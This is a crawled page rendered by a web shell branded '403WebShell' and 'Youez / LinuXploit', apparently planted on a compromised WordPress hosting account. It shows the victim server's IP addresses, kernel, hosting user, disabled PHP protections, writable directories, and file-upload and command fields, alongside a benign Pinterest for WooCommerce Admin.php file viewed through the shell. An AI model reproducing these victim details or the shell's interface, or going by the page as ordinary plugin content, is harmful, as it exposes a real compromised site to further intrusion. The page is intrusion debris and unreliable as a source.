Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.117.192.205
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/plugins/pinterest-for-woocommerce/src/Admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/plugins/pinterest-for-woocommerce/src/Admin/Admin.php
<?php
/**
 * Class Admin
 *
 * @package Automattic\WooCommerce\Pinterest\Admin
 */

declare( strict_types=1 );

namespace Automattic\WooCommerce\Pinterest\Admin;

use Automattic\WooCommerce\Pinterest\Product\GoogleCategorySearch;
use Automattic\WooCommerce\Pinterest\View\ViewException;
use Automattic\WooCommerce\Pinterest\View\ViewFactory;

/**
 * Class Admin
 */
class Admin {

	/**
	 * View factory.
	 *
	 * @var ViewFactory
	 */
	protected $view_factory;

	/**
	 * Admin constructor.
	 *
	 * @param ViewFactory $view_factory View factory.
	 */
	public function __construct( ViewFactory $view_factory ) {
		$this->view_factory = $view_factory;
	}

	/**
	 * Register a service.
	 */
	public function register(): void {
		add_action(
			'admin_enqueue_scripts',
			function() {
				$this->enqueue_assets();
			}
		);

		( new GoogleCategorySearch() )->register();
	}

	/**
	 * Enqueues any assets.
	 */
	protected function enqueue_assets() {
		$screen = get_current_screen();

		if ( $screen && 'product' === $screen->id ) {
			wp_enqueue_style(
				'pinterest-product-attributes-css',
				Pinterest_For_Woocommerce()->plugin_url() . '/assets/build/style-product-attributes.css',
				array(),
				PINTEREST_FOR_WOOCOMMERCE_VERSION
			);
		}
	}

	/**
	 * Get the admin view.
	 *
	 * @param string $view              Name of the view.
	 * @param array  $context_variables Array of variables to pass to the view.
	 *
	 * @return string The rendered view
	 *
	 * @throws ViewException If the view doesn't exist or can't be loaded.
	 */
	public function get_view( string $view, array $context_variables = array() ): string {
		return $this->view_factory->create( $view )
							->render( $context_variables );
	}

}

Youez - 2016 - github.com/yon3zu
LinuXploit